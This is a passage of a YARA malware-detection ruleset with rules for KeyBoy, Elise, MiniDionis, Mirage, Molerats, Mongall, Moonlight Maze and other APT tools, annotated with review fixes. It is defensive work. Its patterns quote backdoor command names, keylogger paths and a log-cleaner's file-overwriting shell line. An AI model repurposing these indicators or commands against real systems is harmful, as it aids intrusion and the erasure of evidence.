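        $x4 = "IEComDll.dat" fullword ascii
        $s1 = "Content-Type: multipart/form-data; boundary=----=_Part_%x" fullword wide
        $s2 = "C:\\Windows\\System32\\rundll32.exe" fullword wide
        $s3 = "network.proxy.socks_port\", " fullword ascii
    condition:
        // One high-confidence $x in a small PE, or four strings of any kind.
        ( uint16(0) == 0x5a4d and filesize < 200KB and ( 1 of ($x*) ) ) or ( 4 of them )
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// KeyBoy dropper: install/privilege status messages. No header or size check.
rule KeyBoy_Dropper
{
    meta:
        Author = "Rapid7 Labs"
        Date = "2013/06/07"
        Description = "Strings inside"
        Reference = "https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india"
    strings:
        $1 = "I am Admin"
        $2 = "I am User"
        $3 = "Run install success!"
        $4 = "Service install success!"
        $5 = "Something Error!"
        $6 = "Not Configed, Exiting"
    condition:
        all of them
}

// KeyBoy backdoor: $-delimited command handler names.
rule KeyBoy_Backdoor
{
    meta:
        Author = "Rapid7 Labs"
        Date = "2013/06/07"
        Description = "Strings inside"
        Reference = "https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india"
    strings:
        $1 = "$login$"
        $2 = "$sysinfo$"
        $3 = "$shell$"
        $4 = "$fileManager$"
        $5 = "$fileDownload$"
        $6 = "$fileUpload$"
    condition:
        all of them
}

/*
 *
 * This section of the rules are all specific to the new 2016
 * KeyBoy sample targeting the Tibetan community. Other following
 * sections capture file characteristics observed across multiple
 * years of development.
 *
 */

rule new_keyboy_export
{
    meta:
        author = "Matt Brooks, @cmatthewbrooks"
        desc = "Matches the new 2016 sample's export"
        date = "2016-08-28"
        md5 = "495adb1b9777002ecfe22aaf52fcee93"
    condition:
        //MZ header
        //PE signature
        //The malware family seems to share many exports
        //but this is the new kid on the block.
        uint16(0) == 0x5A4D and
        uint32(uint32(0x3C)) == 0x00004550 and
        filesize < 200KB and
        pe.exports("cfsUpdate")
}

rule new_keyboy_header_codes
{
    meta:
        author = "Matt Brooks, @cmatthewbrooks"
        desc = "Matches the 2016 sample's header codes"
        date = "2016-08-28"
        md5 = "495adb1b9777002ecfe22aaf52fcee93"
    strings:
        $s1 = "*l*" wide fullword
        $s2 = "*a*" wide fullword
        $s3 = "*s*" wide fullword
        $s4 = "*d*" wide fullword
        $s5 = "*f*" wide fullword
        $s6 = "*g*" wide fullword
        $s7 = "*h*" wide fullword
    condition:
        //MZ header
        //PE signature
        uint16(0) == 0x5A4D and
        uint32(uint32(0x3C)) == 0x00004550 and
        filesize < 200KB and
        all of them
}

/*
 *
 * This section of the rules are all broader and will hit on
 * older KeyBoy samples and other samples possibly part of a
 * a larger development effort.
 *
 */

// NOTE(review): several of these commands ("Update", "Refresh", "Download",
// "Disconnect") are common words; the 6-of-12 threshold is what keeps this
// usable, so do not lower it.
rule keyboy_commands
{
    meta:
        author = "Matt Brooks, @cmatthewbrooks"
        desc = "Matches the 2016 sample's sent and received commands"
        date = "2016-08-28"
        md5 = "495adb1b9777002ecfe22aaf52fcee93"
    strings:
        $s1 = "Update" wide fullword
        $s2 = "UpdateAndRun" wide fullword
        $s3 = "Refresh" wide fullword
        $s4 = "OnLine" wide fullword
        $s5 = "Disconnect" wide fullword
        $s6 = "Pw_Error" wide fullword
        $s7 = "Pw_OK" wide fullword
        $s8 = "Sysinfo" wide fullword
        $s9 = "Download" wide fullword
        $s10 = "UploadFileOk" wide fullword
        $s11 = "RemoteRun" wide fullword
        $s12 = "FileManager" wide fullword
    condition:
        //MZ header
        //PE signature
        uint16(0) == 0x5A4D and
        uint32(uint32(0x3C)) == 0x00004550 and
        filesize < 200KB and
        6 of them
}

// FIX: upstream $s15 was byte-identical to $s4 ("CreateThread DownloadFile[%s]
// Error!"), so a single occurrence counted twice toward "3 of ($s*)" and the
// effective threshold was two distinct strings. The duplicate is removed;
// identifiers are otherwise unchanged (hence the $s14 -> $s16 gap).
rule keyboy_errors
{
    meta:
        author = "Matt Brooks, @cmatthewbrooks"
        desc = "Matches the sample's shell error2 log statements"
        date = "2016-08-28"
        md5 = "495adb1b9777002ecfe22aaf52fcee93"
    strings:
        //These strings are in ASCII pre-2015 and UNICODE in 2016
        $error = "Error2" ascii wide
        //2016 specific:
        $s1 = "Can't find [%s]!Check the file name and try again!" ascii wide
        $s2 = "Open [%s] error! %d" ascii wide
        $s3 = "The Size of [%s] is zero!" ascii wide
        $s4 = "CreateThread DownloadFile[%s] Error!" ascii wide
        $s5 = "UploadFile [%s] Error:Connect Server Failed!" ascii wide
        $s6 = "Receive [%s] Error(Recved[%d] != Send[%d])!" ascii wide
        $s7 = "Receive [%s] ok! Use %2.2f seconds, Average speed %2.2f k/s" ascii wide
        $s8 = "CreateThread UploadFile[%s] Error!" ascii wide
        //Pre-2016:
        $s9 = "Ready Download [%s] ok!" ascii wide
        $s10 = "Get ControlInfo from FileClient error!" ascii wide
        $s11 = "FileClient has a error!" ascii wide
        $s12 = "VirtualAlloc SendBuff Error(%d)" ascii wide
        $s13 = "ReadFile [%s] Error(%d)..." ascii wide
        $s14 = "ReadFile [%s] Data[Readed(%d) != FileSize(%d)] Error..." ascii wide
        $s16 = "RecvData MyRecv_Info Size Error!" ascii wide
        $s17 = "RecvData MyRecv_Info Tag Error!" ascii wide
        $s18 = "SendData szControlInfo_1 Error!" ascii wide
        $s19 = "SendData szControlInfo_3 Error!" ascii wide
        $s20 = "VirtualAlloc RecvBuff Error(%d)" ascii wide
        $s21 = "RecvData Error!" ascii wide
        // Mismatched bracket "[%s}" kept verbatim; presumably as it appears in the binary.
        $s22 = "WriteFile [%s} Error(%d)..." ascii wide
    condition:
        //MZ header
        //PE signature
        uint16(0) == 0x5A4D and
        uint32(uint32(0x3C)) == 0x00004550 and
        filesize < 200KB and
        $error and
        3 of ($s*)
}

// System-survey format strings (typos such as "ResgisterGroup" are the malware's own).
rule keyboy_systeminfo
{
    meta:
        author = "Matt Brooks, @cmatthewbrooks"
        desc = "Matches the system information format before sending to C2"
        date = "2016-08-28"
        md5 = "495adb1b9777002ecfe22aaf52fcee93"
    strings:
        //These strings are ASCII pre-2015 and UNICODE in 2016
        $s1 = "SystemVersion: %s" ascii wide
        $s2 = "Product ID: %s" ascii wide
        $s3 = "InstallPath: %s" ascii wide
        $s4 = "InstallTime: %d-%d-%d, %02d:%02d:%02d" ascii wide
        $s5 = "ResgisterGroup: %s" ascii wide
        $s6 = "RegisterUser: %s" ascii wide
        $s7 = "ComputerName: %s" ascii wide
        $s8 = "WindowsDirectory: %s" ascii wide
        $s9 = "System Directory: %s" ascii wide
        $s10 = "Number of Processors: %d" ascii wide
        $s11 = "CPU[%d]: %s: %sMHz" ascii wide
        $s12 = "RAM: %dMB Total, %dMB Free." ascii wide
        $s13 = "DisplayMode: %d x %d, %dHz, %dbit" ascii wide
        $s14 = "Uptime: %d Days %02u:%02u:%02u" ascii wide
    condition:
        //MZ header
        //PE signature
        uint16(0) == 0x5A4D and
        uint32(uint32(0x3C)) == 0x00004550 and
        filesize < 200KB and
        7 of them
}

// FIX: upstream condition was "... and pe.exports("Embedding") or
// pe.exports("SSSS") or pe.exports("GetUP")". "and" binds tighter than "or",
// so the MZ/PE/size checks only guarded the first export and any file
// exporting "SSSS" or "GetUP" matched on its own. The exports are now grouped.
// The desc was a copy of new_keyboy_export's; it is reworded to match the
// rule name and the section comment above (older/related samples).
rule keyboy_related_exports
{
    meta:
        author = "Matt Brooks, @cmatthewbrooks"
        desc = "Matches exports observed in related KeyBoy samples"
        date = "2016-08-28"
        md5 = "495adb1b9777002ecfe22aaf52fcee93"
    condition:
        //MZ header
        //PE signature
        uint16(0) == 0x5A4D and
        uint32(uint32(0x3C)) == 0x00004550 and
        filesize < 200KB and
        (pe.exports("Embedding") or pe.exports("SSSS") or pe.exports("GetUP"))
}

// Note: The use of the .Init section has been observed in nearly
// all samples with the exception of the 2013 VN dropper from the
// Rapid7 blog. The config data was stored in that sample's .data
// section.
rule keyboy_init_config_section
{
    meta:
        author = "Matt Brooks, @cmatthewbrooks"
        desc = "Matches the Init section where the config is stored"
        date = "2016-08-28"
    condition:
        //MZ header
        //PE signature
        //Payloads are normally smaller but the new dropper we spotted
        //is a bit larger.
        //Observed virtual sizes of the .Init section vary but they've
        //always been 1024, 2048, or 4096 bytes.
        //FIX: 0 % 1024 == 0, so an empty ".Init" section used to satisfy the
        //modulus test; require a non-zero size, consistent with the observed values.
        uint16(0) == 0x5A4D and
        uint32(uint32(0x3C)) == 0x00004550 and
        filesize < 300KB and
        for any i in (0..pe.number_of_sections - 1):
            (pe.sections[i].name == ".Init" and
             pe.sections[i].virtual_size > 0 and
             pe.sections[i].virtual_size % 1024 == 0)
}

// Elise (Lotus Blossom) backdoor. $s3 "Kernel32.dll" is generic on its own;
// the rule needs every $s* plus the MZ header, so it is not a weak link here.
rule EliseLotusBlossom
{
    meta:
        author = "Jose Ramon Palanco"
        date = "2015-06-23"
        description = "Elise Backdoor Trojan"
        ref = "https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html"
    strings:
        $magic = { 4d 5a }
        $s1 = "\",Update" wide
        $s2 = "LoaderDLL.dll"
        $s3 = "Kernel32.dll"
        $s4 = "{5947BACD-63BF-4e73-95D7-0C8A98AB95F2}"
        $s5 = "\\Network\\" wide
        $s6 = "0SSSSS"
        $s7 = "441202100205"
        $s8 = "0WWWWW"
    condition:
        $magic at 0 and all of ($s*)
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.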
*/

// MiniDionis (readerView.exe / adobe.exe): two strings plus one of three
// opcode sequences, which keeps the rule tied to this compile rather than to
// the strings alone.
rule MiniDionis_readerView
{
    meta:
        description = "MiniDionis Malware - file readerView.exe / adobe.exe"
        author = "Florian Roth"
        reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
        date = "2015-07-20"
        /* Original Hash */
        hash1 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
        /* Derived Samples */
        hash2 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
        hash3 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
        hash4 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
        hash5 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
        hash6 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
    strings:
        $s1 = "%ws_out%ws" fullword wide /* score: '8.00' */
        $s2 = "dnlibsh" fullword ascii /* score: '7.00' */
        $op0 = { 0f b6 80 68 0e 41 00 0b c8 c1 e1 08 0f b6 c2 8b } /* Opcode */
        $op1 = { 8b ce e8 f8 01 00 00 85 c0 74 41 83 7d f8 00 0f } /* Opcode */
        $op2 = { e8 2f a2 ff ff 83 20 00 83 c8 ff 5f 5e 5d c3 55 } /* Opcode */
    condition:
        uint16(0) == 0x5a4d and filesize < 500KB and all of ($s*) and 1 of ($op*)
}

/* Related - SFX files or packed files with typical malware content -------- */

// ZIP ("PK") archive whose first entry name (offsets 3..80 cover the first
// local file header) contains "voicemail" and ".exe".
// NOTE(review): this is a lure-name heuristic, not a malware signature; expect
// it to flag any voicemail-themed zipped executable.
rule Malicious_SFX1
{
    meta:
        description = "SFX with voicemail content"
        author = "Florian Roth"
        reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
        date = "2015-07-20"
        hash = "c0675b84f5960e95962d299d4c41511bbf6f8f5f5585bdacd1ae567e904cb92f"
    strings:
        $s0 = "voicemail" ascii /* PEStudio Blacklist: strings */ /* score: '30.00' */
        $s1 = ".exe" ascii
    condition:
        uint16(0) == 0x4b50 and filesize < 1000KB and $s0 in (3..80) and $s1 in (3..80)
}

// PE self-extractor carrying adobe.exe. $s2/$s3 are stock SFX-stub strings
// (extraction banner, password dialog id); $s1 is what makes it specific.
rule Malicious_SFX2
{
    meta:
        description = "SFX with adobe.exe content"
        author = "Florian Roth"
        reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
        date = "2015-07-20"
        hash = "502e42dc99873c52c3ca11dd3df25aad40d2b083069e8c22dd45da887f81d14d"
    strings:
        $s1 = "adobe.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '27.00' */
        $s2 = "Extracting files to %s folder$Extracting files to temporary folder" fullword wide /* PEStudio Blacklist: strings */ /* score: '26.00' */
        $s3 = "GETPASSWORD1" fullword wide /* PEStudio Blacklist: strings */ /* score: '23.00' */
    condition:
        uint16(0) == 0x5a4d and filesize < 1000KB and all of them
}

// Tiny VBS cleanup script (1.vbs): sleeps, then deletes a file via FSO. The
// Sleep call must appear within the first 40 bytes, which pins the layout of
// the dropped script rather than generic VBScript.
rule MiniDionis_VBS_Dropped
{
    meta:
        description = "Dropped File - 1.vbs"
        author = "Florian Roth"
        reference = "https://malwr.com/analysis/ZDc4ZmIyZDI4MTVjNGY5NWI0YzE3YjIzNGFjZTcyYTY/"
        date = "2015-07-21"
        hash = "97dd1ee3aca815eb655a5de9e9e8945e7ba57f458019be6e1b9acb5731fa6646"
    strings:
        $s1 = "Wscript.Sleep 5000" ascii
        $s2 = "Set FSO = CreateObject(\"Scripting.FileSystemObject\")" ascii
        $s3 = "Set WshShell = CreateObject(\"WScript.Shell\")" ascii
        $s4 = "If(FSO.FileExists(\"" ascii
        $s5 = "then FSO.DeleteFile(\".\\" ascii
    condition:
        filesize < 1KB and all of them and $s1 in (0..40)
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// Mirage RAT identifying strings (anonymous $ identifiers; either one suffices).
rule MirageStrings
{
    meta:
        description = "Mirage Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-25"
    strings:
        $ = "Neo,welcome to the desert of real." wide ascii
        $ = "/result?hl=en&id=%s"
    condition:
        any of them
}

// Wrapper rule: matches whenever MirageStrings does (rule reference, no strings of its own).
rule Mirage
{
    meta:
        description = "Mirage"
        author = "Seth Hardy"
        last_modified = "2014-06-25"
    condition:
        MirageStrings
}

// NOTE(review): Date and Reference are unfilled template placeholders in the
// upstream rule; do not read them as data.
// NOTE(review): "Mirage" (any casing-sensitive occurrence) or "Encoding: gzip"
// plus a "/<word>?hl=en" URI is weak — ordinary HTTP clients can satisfy the
// $b/$c pair. Prefer MirageStrings / Mirage for high-confidence hits and treat
// this rule as a hunting aid.
rule Mirage_APT
{
    meta:
        Author = "Silas Cutler"
        Date = "yyyy/mm/dd"
        Description = "Malware related to APT campaign"
        Reference = "Useful link"
    strings:
        $a1 = "welcome to the desert of the real"
        $a2 = "Mirage"
        $b = "Encoding: gzip"
        $c = /\/[A-Za-z]*\?hl=en/
    condition:
        (($a1 or $a2) or $b) and $c
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
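*/

// Molerats code-signing certificates. The 16-byte patterns are presumably the
// certificate serial numbers (per the description); the rule matches them
// anywhere in the file, so it also fires on certificate files, memory dumps,
// and anything else that embeds them — not only on signed PEs.
rule Molerats_certs
{
    meta:
        Author = "FireEye Labs"
        Date = "2013/08/23"
        Description = "this rule detections code signed with certificates used by the Molerats actor"
        Reference = "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html"
    strings:
        $cert1 = { 06 50 11 A5 BC BF 83 C0 93 28 16 5E 7E 85 27 75 }
        $cert2 = { 03 e1 e1 aa a5 bc a1 9f ba 8c 42 05 8b 4a bf 28 }
        $cert3 = { 0c c0 35 9c 9c 3c da 00 d7 e9 da 2d c6 ba 7b 6d }
    condition:
        1 of ($cert*)
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// Mongall RTF lure: the strings look like RTF \info group entries (\author,
// \title, \company, \creatim, \password) from one authoring template. There is
// no RTF magic check, so the rule is carried entirely by these five strings.
// FIX: upstream stored the sample MD5 under "reference"; it is a hash, and the
// rest of this file uses "hash" for that, so the key is renamed. The date
// "01/04/2014" is kept verbatim (its day/month order is ambiguous).
rule Backdoor_APT_Mongal
{
    meta:
        author = "@patrickrolsen"
        maltype = "Backdoor.APT.Mongall"
        version = "0.1"
        hash = "fd69a799e21ccb308531ce6056944842"
        date = "01/04/2014"
    strings:
        $author = "author user"
        $title = "title Vjkygdjdtyuj" nocase
        $comp = "company ooo"
        $cretime = "creatim\\yr2012\\mo4\\dy19\\hr15\\min10"
        $passwd = "password 00000000"
    condition:
        all of them
}

// Mongall code feature. The bytes decode (x86) to:
//   mov ecx,eax / mov eax,0x10624DD3 / mul ecx / shr edx,6 / sub edx,esi /
//   cmp edx,5 / jbe <back>
// 0x10624DD3 with shr 6 is the reciprocal-multiply form of an unsigned
// divide by 1000, so this appears to be a "(ticks - start)/1000 <= 5" delay
// loop around GetTickCount, as the upstream comment says.
rule MongalCode
{
    meta:
        description = "Mongal code features"
        author = "Seth Hardy"
        last_modified = "2014-07-15"
    strings:
        // gettickcount value checking
        $ = { 8B C8 B8 D3 4D 62 10 F7 E1 C1 EA 06 2B D6 83 FA 05 76 EB }
    condition:
        any of them
}

// Mongall file-name artefacts; any one suffices.
rule MongalStrings
{
    meta:
        description = "Mongal Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-07-15"
    strings:
        $ = "NSCortr.dll"
        $ = "NSCortr1.dll"
        $ = "Sina.exe"
    condition:
        any of them
}

// Wrapper: either the code feature or the strings.
rule Mongal
{
    meta:
        description = "Mongal"
        author = "Seth Hardy"
        last_modified = "2014-07-15"
    condition:
        MongalCode or MongalStrings
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.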
*/

// Moonlight Maze Loki2 variants: attacker-authored usage/error strings and
// vowel-stripped log messages ($a7-$a10). Any single string matches, so the
// rule is as strong as its weakest string; "ork error" is deliberately
// fullword so that e.g. "Network error" does not match.
rule apt_RU_MoonlightMaze_customlokitools
{
    meta:
        author = "Kaspersky Lab"
        date = "2017-03-15"
        version = "1.1"
        last_modified = "2017-03-22"
        reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
        description = "Rule to detect Moonlight Maze Loki samples by custom attacker-authored strings"
        hash = "14cce7e641d308c3a177a8abb5457019"
        hash = "a3164d2bbc45fb1eef5fde7eb8b245ea"
        hash = "dabee9a7ea0ddaf900ef1e3e166ffe8a"
        hash = "1980958afffb6a9d5a6c73fc1e2795c2"
        hash = "e59f92aadb6505f29a9f368ab803082e"
    strings:
        $a1="Write file Ok..." ascii wide
        $a2="ERROR: Can not open socket...." ascii wide
        $a3="Error in parametrs:" ascii wide
        $a4="Usage: @<get/put> <IP> <PORT> <file>" ascii wide
        $a5="ERROR: Not connect..." ascii wide
        $a6="Connect successful...." ascii wide
        $a7="clnt <%d> rqstd n ll kll" ascii wide
        $a8="clnt <%d> rqstd swap" ascii wide
        $a9="cld nt sgnl prcs grp" ascii wide
        $a10="cld nt sgnl prnt" ascii wide
        //keeping only ascii version of string ->
        $a11="ork error" ascii fullword
    condition:
        ((any of ($a*)))
}

// Moonlight Maze sniffers "ora" and "tdn": /var/tmp drop paths and
// pid/gid/device log formats. No ELF header check (unlike the later rules
// below), so these also hit scripts, logs or memory that quote the paths.
rule apt_RU_MoonlightMaze_customsniffer
{
    meta:
        author = "Kaspersky Lab"
        date = "2017-03-15"
        version = "1.1"
        reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
        description = "Rule to detect Moonlight Maze sniffer tools"
        hash = "7b86f40e861705d59f5206c482e1f2a5"
        hash = "927426b558888ad680829bd34b0ad0e7"
        original_filename = "ora;tdn"
    strings:
        //strings from ora ->
        $a1="/var/tmp/gogo" fullword
        $a2="myfilename= |%s|" fullword
        $a3="mypid,mygid=" fullword
        $a4="mypid=|%d| mygid=|%d|" fullword
        //strings from tdn ->
        $a5="/var/tmp/task" fullword
        $a6="mydevname= |%s|" fullword
    condition:
        ((any of ($a*)))
}

// Loki2 hard-coded Diffie-Hellman modulus. The pattern is 24 bytes, i.e. a
// prefix of the 384-bit (48-byte) prime named in the description — enough to
// be unique, and it will also match any other code that embeds that prime.
rule loki2crypto
{
    meta:
        author = "Costin Raiu, Kaspersky Lab"
        date = "2017-03-21"
        version = "1.0"
        description = "Rule to detect hardcoded DH modulus used in 1996/1997 Loki2 sourcecode; #ifdef STRONG_CRYPTO /* 384-bit strong prime */"
        reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
        hash = "19fbd8cbfb12482e8020a887d6427315"
        hash = "ea06b213d5924de65407e8931b1e4326"
        hash = "14ecd5e6fc8e501037b54ca263896a11"
        hash = "e079ec947d3d4dacb21e993b760a65dc"
        hash = "edf900cebb70c6d1fcab0234062bfc28"
    strings:
        $modulus={DA E1 01 CD D8 C9 70 AF C2 E4 F2 7A 41 8B 43 39 52 9B 4B 4D E5 85 F8 49}
    condition:
        (any of them)
}

// Moonlight Maze "de"/"deg" tunnel tool. Two of three strings required.
// NOTE(review): the upstream comment on $a3 says "%s\r..." but the bytes are
// 0A (LF), so the pattern is actually "%s\n%s\n%s\n%s\n".
rule apt_RU_MoonlightMaze_de_tool
{
    meta:
        author = "Kaspersky Lab"
        date = "2017-03-27"
        version = "1.0"
        last_modified = "2017-03-27"
        reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
        description = "Rule to detect Moonlight Maze 'de' and 'deg' tunnel tool"
        hash = "4bc7ed168fb78f0dc688ee2be20c9703"
        hash = "8b56e8552a74133da4bc5939b5f74243"
    strings:
        $a1="Vnuk: %d" ascii fullword
        $a2="Syn: %d" ascii fullword
        //%s\r%s\r%s\r%s\r ->
        $a3={25 73 0A 25 73 0A 25 73 0A 25 73 0A}
    condition:
        ((2 of ($a*)))
}

// Moonlight Maze "cle" log cleaner (template-based line removal); three of six.
// $a4 and $a6 carry no modifiers and so match ASCII only.
rule apt_RU_MoonlightMaze_cle_tool
{
    meta:
        author = "Kaspersky Lab"
        date = "2017-03-27"
        version = "1.0"
        last_modified = "2017-03-27"
        reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
        description = "Rule to detect Moonlight Maze 'cle' log cleaning tool"
        hash = "647d7b711f7b4434145ea30d0ef207b0"
    strings:
        $a1="./a filename template_file" ascii wide
        $a2="May be %s is empty?" ascii wide
        $a3="template string = |%s|" ascii wide
        $a4="No blocks !!!"
        $a5="No data in this block !!!!!!" ascii wide
        $a6="No good line"
    condition:
        ((3 of ($a*)))
}

// Moonlight Maze "xk" keylogger: log banners and /var/tmp/task* paths.
// "/var/tmp/task" is shared with the sniffer rule above, so a hit on both is
// expected for files that carry that path; three strings are still required.
rule apt_RU_MoonlightMaze_xk_keylogger
{
    meta:
        author = "Kaspersky Lab"
        date = "2017-03-27"
        version = "1.0"
        last_modified = "2017-03-27"
        reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
        description = "Rule to detect Moonlight Maze 'xk' keylogger"
    strings:
        $a1="Log ended at => %s"
        $a2="Log started at => %s [pid %d]"
        $a3="/var/tmp/task" fullword
        $a4="/var/tmp/taskhost" fullword
        $a5="my hostname: %s"
        $a6="/var/tmp/tasklog"
        $a7="/var/tmp/.Xtmp01" fullword
        $a8="myfilename=-%s-"
        $a9="/var/tmp/taskpid"
        $a10="mypid=-%d-" fullword
        $a11="/var/tmp/taskgid" fullword
        $a12="mygid=-%d-" fullword
    condition:
        ((3 of ($a*)))
}

// Encrypted keylog files: an 8-byte value anchored at offset 0 (presumably the
// encrypted form of a fixed log header — the rule does not say).
rule apt_RU_MoonlightMaze_encrypted_keylog
{
    meta:
        author = "Kaspersky Lab"
        date = "2017-03-27"
        version = "1.0"
        last_modified = "2017-03-27"
        reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
        description = "Rule to detect Moonlight Maze encrypted keylogger logs"
    strings:
        $a1={47 01 22 2A 6D 3E 39 2C}
    condition:
        ($a1 at 0)
}

// IRIX local exploits (David Hedley) reused by Moonlight Maze. uint32(0) is
// always read little-endian, so 0x464c457f is the ELF magic 7F 45 4C 46
// regardless of the target's byte order.
rule apt_RU_MoonlightMaze_IRIX_exploit_GEN
{
    meta:
        author = "Kaspersky Lab"
        date = "2017-03-27"
        version = "1.0"
        last_modified = "2017-03-27"
        reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
        description = "Rule to detect Irix exploits from David Hedley used by Moonlight Maze hackers"
        reference2 = "https://www.exploit-db.com/exploits/19274/"
        hash = "008ea82f31f585622353bd47fa1d84be" //df3
        hash = "a26bad2b79075f454c83203fa00ed50c" //log
        hash = "f67fc6e90f05ba13f207c7fdaa8c2cab" //xconsole
        hash = "5937db3896cdd8b0beb3df44e509e136" //xlock
        hash = "f4ed5170dcea7e5ba62537d84392b280" //xterm
    strings:
        $a1="stack = 0x%x, targ_addr = 0x%x"
        $a2="execl failed"
    condition:
        (uint32(0)==0x464c457f) and (all of them)
}

// utclean.c-derived wtmp/utmp cleaner ("u"). ELF only, any one string.
// NOTE(review): $a1 "Hiding complit...n" is kept verbatim from upstream; if the
// binary actually ends that message with a newline (C "\n"), a YARA "\n"
// escape would be needed and $a1 alone would never match — $a2/$a3 still cover it.
rule apt_RU_MoonlightMaze_u_logcleaner
{
    meta:
        author = "Kaspersky Lab"
        date = "2017-03-27"
        version = "1.0"
        last_modified = "2017-03-27"
        reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
        description = "Rule to detect log cleaners based on utclean.c"
        reference2 = "http://cd.textfiles.com/cuteskunk/Unix-Hacking-Exploits/utclean.c"
        hash = "d98796dcda1443a37b124dbdc041fe3b"
        hash = "73a518f0a73ab77033121d4191172820"
    strings:
        $a1="Hiding complit...n"
        $a2="usage: %s <username> <fixthings> [hostname]"
        $a3="ls -la %s* ; /bin/cp ./wtmp.tmp %s; rm ./wtmp.tmp"
    condition:
        (uint32(0)==0x464c457f) and (any of them)
}

// wipe.c-derived log cleaner: ELF with two of the usage/error strings.
rule apt_RU_MoonlightMaze_wipe
{
    meta:
        author = "Kaspersky Lab"
        date = "2017-03-27"
        version = "1.0"
        last_modified = "2017-03-27"
        reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
        description = "Rule to detect log cleaner based on wipe.c"
        reference2 = "http://www.afn.org/~afn28925/wipe.c"
        hash = "e69efc504934551c6a77b525d5343241"
    strings:
        $a1="ERROR: Unlinking tmp WTMP file."
        $a2="USAGE: wipe [ u|w|l|a ] ...options..."
        $a3="Erase acct entries on tty : wipe a [username] [tty]"
        $a4="Alter lastlog entry : wipe l [username] [tty] [time] [host]"
    condition:
        (uint32(0)==0x464c457f) and (2 of them)
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/ import "pe" rule APT_NGO_wuaclt { meta: author = "AlienVault Labs" strings: $a = "%%APPDATA%%\\Microsoft\\wuauclt\\wuauclt.dat" $b = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" $c = "/news/show.asp?id%d=%d" $d = "%%APPDATA%%\\Microsoft\\wuauclt\\" $e = "0l23kj@nboxu" $f = "%%s.asp?id=%%d&Sid=%%d" $g = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SP Q%%d)" $h = "Cookies: UseID=KGIOODAOOK%%s" condition: ($a and $b and $c) or ($d and $e) or ($f and $g and $h) } rule APT_NGO_wuaclt_PDF { meta: author = "AlienVault Labs" strings: $pdf = "%PDF" nocase $comment = {3C 21 2D 2D 0D 0A 63 57 4B 51 6D 5A 6C 61 56 56 56 56 56 56 56 56 56 56 56 56 56 63 77 53 64 63 6A 4B 7A 38 35 6D 37 4A 56 6D 37 4A 46 78 6B 5A 6D 5A 6D 52 44 63 5A 58 41 73 6D 5A 6D 5A 7A 42 4A 31 79 73 2F 4F 0D 0A} condition: $pdf at 0 and $comment in (0..200) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule ZhoupinExploitCrew { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "zhoupin exploit crew" nocase $s2 = "zhopin exploit crew" nocase condition: 1 of them } rule BackDoorLogger { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "BackDoorLogger" $s2 = "zhuAddress" condition: all of them } rule Jasus { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "pcap_dump_open" $s2 = "Resolving IPs to poison..." 
